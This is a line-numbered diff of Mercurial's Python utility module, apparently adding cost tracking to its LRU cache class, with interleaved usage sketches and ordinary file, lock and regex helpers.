1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 __slots__ = (u'next', u'prev', u'key', u'value')
1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 self.cost = 0
1220 1221
1221 1222 def markempty(self):
1222 1223 """Mark the node as emptied."""
1223 1224 self.key = _notset
1225 self.value = None
1226 self.cost = 0
1224 1227
1225 1228 class lrucachedict(object):
1226 1229 """Dict that caches most recent accesses and sets.
1227 1230
1228 1231 The dict consists of an actual backing dict - indexed by original
1229 1232 key - and a doubly linked circular list defining the order of entries in
1230 1233 the cache.
1231 1234
1232 1235 The head node is the newest entry in the cache. If the cache is full,
1233 1236 we recycle head.prev and make it the new head. Cache accesses result in
1234 1237 the node being moved to before the existing head and being marked as the
1235 1238 new head node.
1239
1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 simply an integer that is specified by the caller. The cache can be queried
1242 for the total cost of all items presently in the cache.
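
For example, a sketch of the cost accounting (keys, values and costs are
illustrative):

>>> d = lrucachedict(2)
>>> d.insert(1, 11, cost=4)
>>> d.insert(2, 22, cost=2)
>>> d.totalcost
6
>>> d.insert(3, 33, cost=1)
>>> 1 in d
False
>>> d.totalcost
3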
1236 1243 """
1237 1244 def __init__(self, max):
1238 1245 self._cache = {}
1239 1246
1240 1247 self._head = head = _lrucachenode()
1241 1248 head.prev = head
1242 1249 head.next = head
1243 1250 self._size = 1
1244 1251 self.capacity = max
1252 self.totalcost = 0
1245 1253
1246 1254 def __len__(self):
1247 1255 return len(self._cache)
1248 1256
1249 1257 def __contains__(self, k):
1250 1258 return k in self._cache
1251 1259
1252 1260 def __iter__(self):
1253 1261 # We don't have to iterate in cache order, but why not.
1254 1262 n = self._head
1255 1263 for i in range(len(self._cache)):
1256 1264 yield n.key
1257 1265 n = n.next
1258 1266
1259 1267 def __getitem__(self, k):
1260 1268 node = self._cache[k]
1261 1269 self._movetohead(node)
1262 1270 return node.value
1263 1271
1264 def __setitem__(self, k, v):
1272 def insert(self, k, v, cost=0):
1273 """Insert a new item in the cache with optional cost value."""
1265 1274 node = self._cache.get(k)
1266 1275 # Replace existing value and mark as newest.
1267 1276 if node is not None:
1277 self.totalcost -= node.cost
1268 1278 node.value = v
1279 node.cost = cost
1280 self.totalcost += cost
1269 1281 self._movetohead(node)
1270 1282 return
1271 1283
1272 1284 if self._size < self.capacity:
1273 1285 node = self._addcapacity()
1274 1286 else:
1275 1287 # Grab the last/oldest item.
1276 1288 node = self._head.prev
1277 1289
1278 1290 # At capacity. Kill the old entry.
1279 1291 if node.key is not _notset:
1292 self.totalcost -= node.cost
1280 1293 del self._cache[node.key]
1281 1294
1282 1295 node.key = k
1283 1296 node.value = v
1297 node.cost = cost
1298 self.totalcost += cost
1284 1299 self._cache[k] = node
1285 1300 # And mark it as newest entry. No need to adjust order since it
1286 1301 # is already self._head.prev.
1287 1302 self._head = node
1288 1303
1304 def __setitem__(self, k, v):
1305 self.insert(k, v)
1306
1289 1307 def __delitem__(self, k):
1290 1308 node = self._cache.pop(k)
1309 self.totalcost -= node.cost
1291 1310 node.markempty()
1292 1311
1293 1312 # Temporarily mark as newest item before re-adjusting head to make
1294 1313 # this node the oldest item.
1295 1314 self._movetohead(node)
1296 1315 self._head = node.next
1297 1316
1298 1317 # Additional dict methods.
1299 1318
1300 1319 def get(self, k, default=None):
1301 1320 try:
1302 1321 return self._cache[k].value
1303 1322 except KeyError:
1304 1323 return default
1305 1324
1306 1325 def clear(self):
1307 1326 n = self._head
1308 1327 while n.key is not _notset:
1328 self.totalcost -= n.cost
1309 1329 n.markempty()
1310 1330 n = n.next
1311 1331
1312 1332 self._cache.clear()
1313 1333
1314 1334 def copy(self, capacity=None):
1315 1335 """Create a new cache as a copy of the current one.
1316 1336
1317 1337 By default, the new cache has the same capacity as the existing one.
1318 1338 But, the cache capacity can be changed as part of performing the
1319 1339 copy.
1320 1340
1321 1341 Items in the copy have an insertion/access order matching this
1322 1342 instance.
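
Costs carry over into the copy, e.g. (illustrative values):

>>> d = lrucachedict(2)
>>> d.insert(1, 11, cost=5)
>>> d.copy().totalcost
5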
1323 1343 """
1324 1344
1325 1345 capacity = capacity or self.capacity
1326 1346 result = lrucachedict(capacity)
1327 1347
1328 1348 # We copy entries by iterating in oldest-to-newest order so the copy
1329 1349 # has the correct ordering.
1330 1350
1331 1351 # Find the first non-empty entry.
1332 1352 n = self._head.prev
1333 1353 while n.key is _notset and n is not self._head:
1334 1354 n = n.prev
1335 1355
1336 1356 # We could potentially skip the first N items when decreasing capacity.
1337 1357 # But let's keep it simple unless it is a performance problem.
1338 1358 for i in range(len(self._cache)):
1339 result[n.key] = n.value
1359 result.insert(n.key, n.value, cost=n.cost)
1340 1360 n = n.prev
1341 1361
1342 1362 return result
1343 1363
1344 1364 def popoldest(self):
1345 1365 """Remove the oldest item from the cache.
1346 1366
1347 1367 Returns the (key, value) describing the removed cache entry.
1348 1368 """
1349 1369 if not self._cache:
1350 1370 return
1351 1371
1352 1372 # Walk the linked list backwards starting at tail node until we hit
1353 1373 # a non-empty node.
1354 1374 n = self._head.prev
1355 1375 while n.key is _notset:
1356 1376 n = n.prev
1357 1377
1358 1378 key, value = n.key, n.value
1359 1379
1360 1380 # And remove it from the cache and mark it as empty.
1361 1381 del self._cache[n.key]
1382 self.totalcost -= n.cost
1362 1383 n.markempty()
1363 1384
1364 1385 return key, value
1365 1386
1366 1387 def _movetohead(self, node):
1367 1388 """Mark a node as the newest, making it the new head.
1368 1389
1369 1390 When a node is accessed, it becomes the freshest entry in the LRU
1370 1391 list, which is denoted by self._head.
1371 1392
1372 1393 Visually, let's make ``N`` the new head node (* denotes head):
1373 1394
1374 1395 previous/oldest <-> head <-> next/next newest
1375 1396
1376 1397 ----<->--- A* ---<->-----
1377 1398 | |
1378 1399 E <-> D <-> N <-> C <-> B
1379 1400
1380 1401 To:
1381 1402
1382 1403 ----<->--- N* ---<->-----
1383 1404 | |
1384 1405 E <-> D <-> C <-> B <-> A
1385 1406
1386 1407 This requires the following moves:
1387 1408
1388 1409 C.next = D (node.prev.next = node.next)
1389 1410 D.prev = C (node.next.prev = node.prev)
1390 1411 E.next = N (head.prev.next = node)
1391 1412 N.prev = E (node.prev = head.prev)
1392 1413 N.next = A (node.next = head)
1393 1414 A.prev = N (head.prev = node)
1394 1415 """
1395 1416 head = self._head
1396 1417 # C.next = D
1397 1418 node.prev.next = node.next
1398 1419 # D.prev = C
1399 1420 node.next.prev = node.prev
1400 1421 # N.prev = E
1401 1422 node.prev = head.prev
1402 1423 # N.next = A
1403 1424 # It is tempting to just use "head" here, but if node is
1404 1425 # adjacent to head, this will do bad things.
1405 1426 node.next = head.prev.next
1406 1427 # E.next = N
1407 1428 node.next.prev = node
1408 1429 # A.prev = N
1409 1430 node.prev.next = node
1410 1431
1411 1432 self._head = node
1412 1433
1413 1434 def _addcapacity(self):
1414 1435 """Add a node to the circular linked list.
1415 1436
1416 1437 The new node is inserted before the head node.
1417 1438 """
1418 1439 head = self._head
1419 1440 node = _lrucachenode()
1420 1441 head.prev.next = node
1421 1442 node.prev = head.prev
1422 1443 node.next = head
1423 1444 head.prev = node
1424 1445 self._size += 1
1425 1446 return node
1426 1447
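# Usage sketch: a hypothetical consumer of the cost tracking above, showing
# how insert(), totalcost and popoldest() can combine to keep a cache under
# an aggregate cost budget. _examplecostbudget and its budget policy are
# illustrative only, not part of this module.
def _examplecostbudget(maxcost):
    d = lrucachedict(4)
    d.insert(b'a', b'value-a', cost=600)
    d.insert(b'b', b'value-b', cost=600)
    # totalcost is now 1200; evict oldest entries until the cache fits
    # the budget again.
    while d.totalcost > maxcost and len(d):
        d.popoldest()
    return d.totalcost
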
1427 1448 def lrucachefunc(func):
1428 1449 '''cache most recent results of function calls'''
1429 1450 cache = {}
1430 1451 order = collections.deque()
1431 1452 if func.__code__.co_argcount == 1:
1432 1453 def f(arg):
1433 1454 if arg not in cache:
1434 1455 if len(cache) > 20:
1435 1456 del cache[order.popleft()]
1436 1457 cache[arg] = func(arg)
1437 1458 else:
1438 1459 order.remove(arg)
1439 1460 order.append(arg)
1440 1461 return cache[arg]
1441 1462 else:
1442 1463 def f(*args):
1443 1464 if args not in cache:
1444 1465 if len(cache) > 20:
1445 1466 del cache[order.popleft()]
1446 1467 cache[args] = func(*args)
1447 1468 else:
1448 1469 order.remove(args)
1449 1470 order.append(args)
1450 1471 return cache[args]
1451 1472
1452 1473 return f
1453 1474
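# Usage sketch: lrucachefunc memoizes the most recent distinct calls (about
# 20 of them), which suits repeated lookups over a small working set. The
# _examplelrucachefunc helper and the wrapped function are hypothetical.
def _examplelrucachefunc():
    def expensive(key):
        return key * 2  # stand-in for a costly computation
    cached = lrucachefunc(expensive)
    cached(3)          # computed and stored
    return cached(3)   # served from the cache
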
1454 1475 class propertycache(object):
1455 1476 def __init__(self, func):
1456 1477 self.func = func
1457 1478 self.name = func.__name__
1458 1479 def __get__(self, obj, type=None):
1459 1480 result = self.func(obj)
1460 1481 self.cachevalue(obj, result)
1461 1482 return result
1462 1483
1463 1484 def cachevalue(self, obj, value):
1464 1485 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1465 1486 obj.__dict__[self.name] = value
1466 1487
1467 1488 def clearcachedproperty(obj, prop):
1468 1489 '''clear a cached property value, if one has been set'''
1469 1490 if prop in obj.__dict__:
1470 1491 del obj.__dict__[prop]
1471 1492
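# Usage sketch: propertycache is a non-data descriptor, so once __get__ has
# stored the result in the instance __dict__, later attribute lookups never
# reach the descriptor again. The _examplecached class is hypothetical.
class _examplecached(object):
    @propertycache
    def answer(self):
        return 42  # runs once; then cached in self.__dict__['answer']
# clearcachedproperty(obj, 'answer') drops the cached value, forcing a
# recomputation on the next access.
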
1472 1493 def increasingchunks(source, min=1024, max=65536):
1473 1494 '''return no less than min bytes per chunk while data remains,
1474 1495 doubling min after each chunk until it reaches max'''
1475 1496 def log2(x):
1476 1497 if not x:
1477 1498 return 0
1478 1499 i = 0
1479 1500 while x:
1480 1501 x >>= 1
1481 1502 i += 1
1482 1503 return i - 1
1483 1504
1484 1505 buf = []
1485 1506 blen = 0
1486 1507 for chunk in source:
1487 1508 buf.append(chunk)
1488 1509 blen += len(chunk)
1489 1510 if blen >= min:
1490 1511 if min < max:
1491 1512 min = min << 1
1492 1513 nmin = 1 << log2(blen)
1493 1514 if nmin > min:
1494 1515 min = nmin
1495 1516 if min > max:
1496 1517 min = max
1497 1518 yield ''.join(buf)
1498 1519 blen = 0
1499 1520 buf = []
1500 1521 if buf:
1501 1522 yield ''.join(buf)
1502 1523
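# Usage sketch: increasingchunks rebuffers many small chunks into
# progressively larger ones, which cuts per-chunk overhead for consumers
# such as file writers. _exampleincreasingchunks is hypothetical.
def _exampleincreasingchunks():
    source = (b'x' * 512 for _ in range(64))
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    # sizes grow roughly as 1024, 2048, 4096, 4096, ... until exhausted
    return sizes
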
1503 1524 def always(fn):
1504 1525 return True
1505 1526
1506 1527 def never(fn):
1507 1528 return False
1508 1529
1509 1530 def nogc(func):
1510 1531 """disable garbage collector
1511 1532
1512 1533 Python's garbage collector triggers a GC each time a certain number of
1513 1534 container objects (the number being defined by gc.get_threshold()) are
1514 1535 allocated even when marked not to be tracked by the collector. Tracking has
1515 1536 no effect on when GCs are triggered, only on what objects the GC looks
1516 1537 into. As a workaround, disable GC while building complex (huge)
1517 1538 containers.
1518 1539
1519 1540 This garbage collector issue has been fixed in 2.7, but it still
1520 1541 affects CPython's performance.
1521 1542 """
1522 1543 def wrapper(*args, **kwargs):
1523 1544 gcenabled = gc.isenabled()
1524 1545 gc.disable()
1525 1546 try:
1526 1547 return func(*args, **kwargs)
1527 1548 finally:
1528 1549 if gcenabled:
1529 1550 gc.enable()
1530 1551 return wrapper
1531 1552
1532 1553 if pycompat.ispypy:
1533 1554 # PyPy runs slower with gc disabled
1534 1555 nogc = lambda x: x
1535 1556
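# Usage sketch: decorate a function that builds a huge container so the
# cyclic GC does not repeatedly scan the partial structure while it grows.
# _examplebuildindex is hypothetical; on PyPy the decorator is a no-op.
@nogc
def _examplebuildindex(n):
    return dict((i, (i, i + 1)) for i in range(n))
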
1536 1557 def pathto(root, n1, n2):
1537 1558 '''return the relative path from one place to another.
1538 1559 root should use os.sep to separate directories
1539 1560 n1 should use os.sep to separate directories
1540 1561 n2 should use "/" to separate directories
1541 1562 returns an os.sep-separated path.
1542 1563
1543 1564 If n1 is a relative path, it is assumed to be
1544 1565 relative to root.
1545 1566 n2 should always be relative to root.
1546 1567 '''
1547 1568 if not n1:
1548 1569 return localpath(n2)
1549 1570 if os.path.isabs(n1):
1550 1571 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1551 1572 return os.path.join(root, localpath(n2))
1552 1573 n2 = '/'.join((pconvert(root), n2))
1553 1574 a, b = splitpath(n1), n2.split('/')
1554 1575 a.reverse()
1555 1576 b.reverse()
1556 1577 while a and b and a[-1] == b[-1]:
1557 1578 a.pop()
1558 1579 b.pop()
1559 1580 b.reverse()
1560 1581 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1561 1582
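# Worked example (assuming POSIX separators): with both names relative to
# root, the walk climbs out of n1 and back down into n2:
#
#   pathto(b'/repo', b'a/b', b'c/d') -> b'../../c/d'
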
1562 1583 # the location of data files matching the source code
1563 1584 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1564 1585 # executable version (py2exe) doesn't support __file__
1565 1586 datapath = os.path.dirname(pycompat.sysexecutable)
1566 1587 else:
1567 1588 datapath = os.path.dirname(pycompat.fsencode(__file__))
1568 1589
1569 1590 i18n.setdatapath(datapath)
1570 1591
1571 1592 def checksignature(func):
1572 1593 '''wrap a function with code to check for calling errors'''
1573 1594 def check(*args, **kwargs):
1574 1595 try:
1575 1596 return func(*args, **kwargs)
1576 1597 except TypeError:
1577 1598 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1578 1599 raise error.SignatureError
1579 1600 raise
1580 1601
1581 1602 return check
1582 1603
1583 1604 # a whitelist of known filesystems where hardlink works reliably
1584 1605 _hardlinkfswhitelist = {
1585 1606 'apfs',
1586 1607 'btrfs',
1587 1608 'ext2',
1588 1609 'ext3',
1589 1610 'ext4',
1590 1611 'hfs',
1591 1612 'jfs',
1592 1613 'NTFS',
1593 1614 'reiserfs',
1594 1615 'tmpfs',
1595 1616 'ufs',
1596 1617 'xfs',
1597 1618 'zfs',
1598 1619 }
1599 1620
1600 1621 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1601 1622 '''copy a file, preserving mode and optionally other stat info like
1602 1623 atime/mtime
1603 1624
1604 1625 checkambig argument is used with filestat, and is useful only if
1605 1626 destination file is guarded by any lock (e.g. repo.lock or
1606 1627 repo.wlock).
1607 1628
1608 1629 copystat and checkambig should be exclusive.
1609 1630 '''
1610 1631 assert not (copystat and checkambig)
1611 1632 oldstat = None
1612 1633 if os.path.lexists(dest):
1613 1634 if checkambig:
1614 1635 oldstat = filestat.frompath(dest)
1615 1636 unlink(dest)
1616 1637 if hardlink:
1617 1638 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1618 1639 # unless we are confident that dest is on a whitelisted filesystem.
1619 1640 try:
1620 1641 fstype = getfstype(os.path.dirname(dest))
1621 1642 except OSError:
1622 1643 fstype = None
1623 1644 if fstype not in _hardlinkfswhitelist:
1624 1645 hardlink = False
1625 1646 if hardlink:
1626 1647 try:
1627 1648 oslink(src, dest)
1628 1649 return
1629 1650 except (IOError, OSError):
1630 1651 pass # fall back to normal copy
1631 1652 if os.path.islink(src):
1632 1653 os.symlink(os.readlink(src), dest)
1633 1654 # copytime is ignored for symlinks, but in general copytime isn't needed
1634 1655 # for them anyway
1635 1656 else:
1636 1657 try:
1637 1658 shutil.copyfile(src, dest)
1638 1659 if copystat:
1639 1660 # copystat also copies mode
1640 1661 shutil.copystat(src, dest)
1641 1662 else:
1642 1663 shutil.copymode(src, dest)
1643 1664 if oldstat and oldstat.stat:
1644 1665 newstat = filestat.frompath(dest)
1645 1666 if newstat.isambig(oldstat):
1646 1667 # stat of copied file is ambiguous to original one
1647 1668 advanced = (
1648 1669 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1649 1670 os.utime(dest, (advanced, advanced))
1650 1671 except shutil.Error as inst:
1651 1672 raise error.Abort(str(inst))
1652 1673
1653 1674 def copyfiles(src, dst, hardlink=None, progress=None):
1654 1675 """Copy a directory tree using hardlinks if possible."""
1655 1676 num = 0
1656 1677
1657 1678 def settopic():
1658 1679 if progress:
1659 1680 progress.topic = _('linking') if hardlink else _('copying')
1660 1681
1661 1682 if os.path.isdir(src):
1662 1683 if hardlink is None:
1663 1684 hardlink = (os.stat(src).st_dev ==
1664 1685 os.stat(os.path.dirname(dst)).st_dev)
1665 1686 settopic()
1666 1687 os.mkdir(dst)
1667 1688 for name, kind in listdir(src):
1668 1689 srcname = os.path.join(src, name)
1669 1690 dstname = os.path.join(dst, name)
1670 1691 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1671 1692 num += n
1672 1693 else:
1673 1694 if hardlink is None:
1674 1695 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1675 1696 os.stat(os.path.dirname(dst)).st_dev)
1676 1697 settopic()
1677 1698
1678 1699 if hardlink:
1679 1700 try:
1680 1701 oslink(src, dst)
1681 1702 except (IOError, OSError):
1682 1703 hardlink = False
1683 1704 shutil.copy(src, dst)
1684 1705 else:
1685 1706 shutil.copy(src, dst)
1686 1707 num += 1
1687 1708 if progress:
1688 1709 progress.increment()
1689 1710
1690 1711 return hardlink, num
1691 1712
1692 1713 _winreservednames = {
1693 1714 'con', 'prn', 'aux', 'nul',
1694 1715 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1695 1716 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1696 1717 }
1697 1718 _winreservedchars = ':*?"<>|'
1698 1719 def checkwinfilename(path):
1699 1720 r'''Check that the base-relative path is a valid filename on Windows.
1700 1721 Returns None if the path is ok, or a UI string describing the problem.
1701 1722
1702 1723 >>> checkwinfilename(b"just/a/normal/path")
1703 1724 >>> checkwinfilename(b"foo/bar/con.xml")
1704 1725 "filename contains 'con', which is reserved on Windows"
1705 1726 >>> checkwinfilename(b"foo/con.xml/bar")
1706 1727 "filename contains 'con', which is reserved on Windows"
1707 1728 >>> checkwinfilename(b"foo/bar/xml.con")
1708 1729 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1709 1730 "filename contains 'AUX', which is reserved on Windows"
1710 1731 >>> checkwinfilename(b"foo/bar/bla:.txt")
1711 1732 "filename contains ':', which is reserved on Windows"
1712 1733 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1713 1734 "filename contains '\\x07', which is invalid on Windows"
1714 1735 >>> checkwinfilename(b"foo/bar/bla ")
1715 1736 "filename ends with ' ', which is not allowed on Windows"
1716 1737 >>> checkwinfilename(b"../bar")
1717 1738 >>> checkwinfilename(b"foo\\")
1718 1739 "filename ends with '\\', which is invalid on Windows"
1719 1740 >>> checkwinfilename(b"foo\\/bar")
1720 1741 "directory name ends with '\\', which is invalid on Windows"
1721 1742 '''
1722 1743 if path.endswith('\\'):
1723 1744 return _("filename ends with '\\', which is invalid on Windows")
1724 1745 if '\\/' in path:
1725 1746 return _("directory name ends with '\\', which is invalid on Windows")
1726 1747 for n in path.replace('\\', '/').split('/'):
1727 1748 if not n:
1728 1749 continue
1729 1750 for c in _filenamebytestr(n):
1730 1751 if c in _winreservedchars:
1731 1752 return _("filename contains '%s', which is reserved "
1732 1753 "on Windows") % c
1733 1754 if ord(c) <= 31:
1734 1755 return _("filename contains '%s', which is invalid "
1735 1756 "on Windows") % stringutil.escapestr(c)
1736 1757 base = n.split('.')[0]
1737 1758 if base and base.lower() in _winreservednames:
1738 1759 return _("filename contains '%s', which is reserved "
1739 1760 "on Windows") % base
1740 1761 t = n[-1:]
1741 1762 if t in '. ' and n not in '..':
1742 1763 return _("filename ends with '%s', which is not allowed "
1743 1764 "on Windows") % t
1744 1765
1745 1766 if pycompat.iswindows:
1746 1767 checkosfilename = checkwinfilename
1747 1768 timer = time.clock
1748 1769 else:
1749 1770 checkosfilename = platform.checkosfilename
1750 1771 timer = time.time
1751 1772
1752 1773 if safehasattr(time, "perf_counter"):
1753 1774 timer = time.perf_counter
1754 1775
1755 1776 def makelock(info, pathname):
1756 1777 """Create a lock file atomically if possible
1757 1778
1758 1779 This may leave a stale lock file if symlink isn't supported and signal
1759 1780 interrupt is enabled.
1760 1781 """
1761 1782 try:
1762 1783 return os.symlink(info, pathname)
1763 1784 except OSError as why:
1764 1785 if why.errno == errno.EEXIST:
1765 1786 raise
1766 1787 except AttributeError: # no symlink in os
1767 1788 pass
1768 1789
1769 1790 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1770 1791 ld = os.open(pathname, flags)
1771 1792 os.write(ld, info)
1772 1793 os.close(ld)
1773 1794
1774 1795 def readlock(pathname):
1775 1796 try:
1776 1797 return os.readlink(pathname)
1777 1798 except OSError as why:
1778 1799 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1779 1800 raise
1780 1801 except AttributeError: # no symlink in os
1781 1802 pass
1782 1803 fp = posixfile(pathname, 'rb')
1783 1804 r = fp.read()
1784 1805 fp.close()
1785 1806 return r
1786 1807
1787 1808 def fstat(fp):
1788 1809 '''stat file object that may not have fileno method.'''
1789 1810 try:
1790 1811 return os.fstat(fp.fileno())
1791 1812 except AttributeError:
1792 1813 return os.stat(fp.name)
1793 1814
1794 1815 # File system features
1795 1816
1796 1817 def fscasesensitive(path):
1797 1818 """
1798 1819 Return true if the given path is on a case-sensitive filesystem
1799 1820
1800 1821 Requires a path (like /foo/.hg) ending with a foldable final
1801 1822 directory component.
1802 1823 """
1803 1824 s1 = os.lstat(path)
1804 1825 d, b = os.path.split(path)
1805 1826 b2 = b.upper()
1806 1827 if b == b2:
1807 1828 b2 = b.lower()
1808 1829 if b == b2:
1809 1830 return True # no evidence against case sensitivity
1810 1831 p2 = os.path.join(d, b2)
1811 1832 try:
1812 1833 s2 = os.lstat(p2)
1813 1834 if s2 == s1:
1814 1835 return False
1815 1836 return True
1816 1837 except OSError:
1817 1838 return True
1818 1839
1819 1840 try:
1820 1841 import re2
1821 1842 _re2 = None
1822 1843 except ImportError:
1823 1844 _re2 = False
1824 1845
1825 1846 class _re(object):
1826 1847 def _checkre2(self):
1827 1848 global _re2
1828 1849 try:
1829 1850 # check if match works, see issue3964
1830 1851 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1831 1852 except ImportError:
1832 1853 _re2 = False
1833 1854
1834 1855 def compile(self, pat, flags=0):
1835 1856 '''Compile a regular expression, using re2 if possible
1836 1857
1837 1858 For best performance, use only re2-compatible regexp features. The
1838 1859 only flags from the re module that are re2-compatible are
1839 1860 IGNORECASE and MULTILINE.'''
1840 1861 if _re2 is None:
1841 1862 self._checkre2()
1842 1863 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1843 1864 if flags & remod.IGNORECASE:
1844 1865 pat = '(?i)' + pat
1845 1866 if flags & remod.MULTILINE:
1846 1867 pat = '(?m)' + pat
1847 1868 try:
1848 1869 return re2.compile(pat)
1849 1870 except re2.error:
1850 1871 pass
1851 1872 return remod.compile(pat, flags)
1852 1873
1853 1874 @propertycache
1854 1875 def escape(self):
1855 1876 '''Return the version of escape corresponding to self.compile.
1856 1877
1857 1878 This is imperfect because whether re2 or re is used for a particular
1858 1879 function depends on the flags, etc, but it's the best we can do.
1859 1880 '''
1860 1881 global _re2
1861 1882 if _re2 is None:
1862 1883 self._checkre2()
1863 1884 if _re2:
1864 1885 return re2.escape
1865 1886 else:
1866 1887 return remod.escape
1867 1888
1868 1889 re = _re()
1869 1890
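# Usage sketch: the wrapper above prefers re2 when it is importable and the
# flags are re2-compatible, and silently falls back to the stdlib engine,
# so call sites look identical either way. _examplerecompile is
# hypothetical.
def _examplerecompile():
    pat = re.compile(br'[a-z]+', remod.IGNORECASE)
    return bool(pat.match(b'Hello'))
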
1870 1891 _fspathcache = {}
1871 1892 def fspath(name, root):
1872 1893 '''Get name in the case stored in the filesystem
1873 1894
1874 1895 The name should be relative to root, and be normcase-ed for efficiency.
1875 1896
1876 1897 Note that this function is unnecessary, and should not be
1877 1898 called, for case-sensitive filesystems (simply because it's expensive).
1878 1899
1879 1900 The root should be normcase-ed, too.
1880 1901 '''
1881 1902 def _makefspathcacheentry(dir):
1882 1903 return dict((normcase(n), n) for n in os.listdir(dir))
1883 1904
1884 1905 seps = pycompat.ossep
1885 1906 if pycompat.osaltsep:
1886 1907 seps = seps + pycompat.osaltsep
1887 1908 # Protect backslashes. This gets silly very quickly.
1888 1909 seps = seps.replace('\\', '\\\\')
1889 1910 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1890 1911 dir = os.path.normpath(root)
1891 1912 result = []
1892 1913 for part, sep in pattern.findall(name):
1893 1914 if sep:
1894 1915 result.append(sep)
1895 1916 continue
1896 1917
1897 1918 if dir not in _fspathcache:
1898 1919 _fspathcache[dir] = _makefspathcacheentry(dir)
1899 1920 contents = _fspathcache[dir]
1900 1921
1901 1922 found = contents.get(part)
1902 1923 if not found:
1903 1924 # retry "once per directory" per "dirstate.walk" which
1904 1925 # may take place for each patch of "hg qpush", for example
1905 1926 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1906 1927 found = contents.get(part)
1907 1928
1908 1929 result.append(found or part)
1909 1930 dir = os.path.join(dir, part)
1910 1931
1911 1932 return ''.join(result)
1912 1933
1913 1934 def checknlink(testfile):
1914 1935 '''check whether hardlink count reporting works properly'''
1915 1936
1916 1937 # testfile may be open, so we need a separate file for checking to
1917 1938 # work around issue2543 (or testfile may get lost on Samba shares)
1918 1939 f1, f2, fp = None, None, None
1919 1940 try:
1920 1941 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
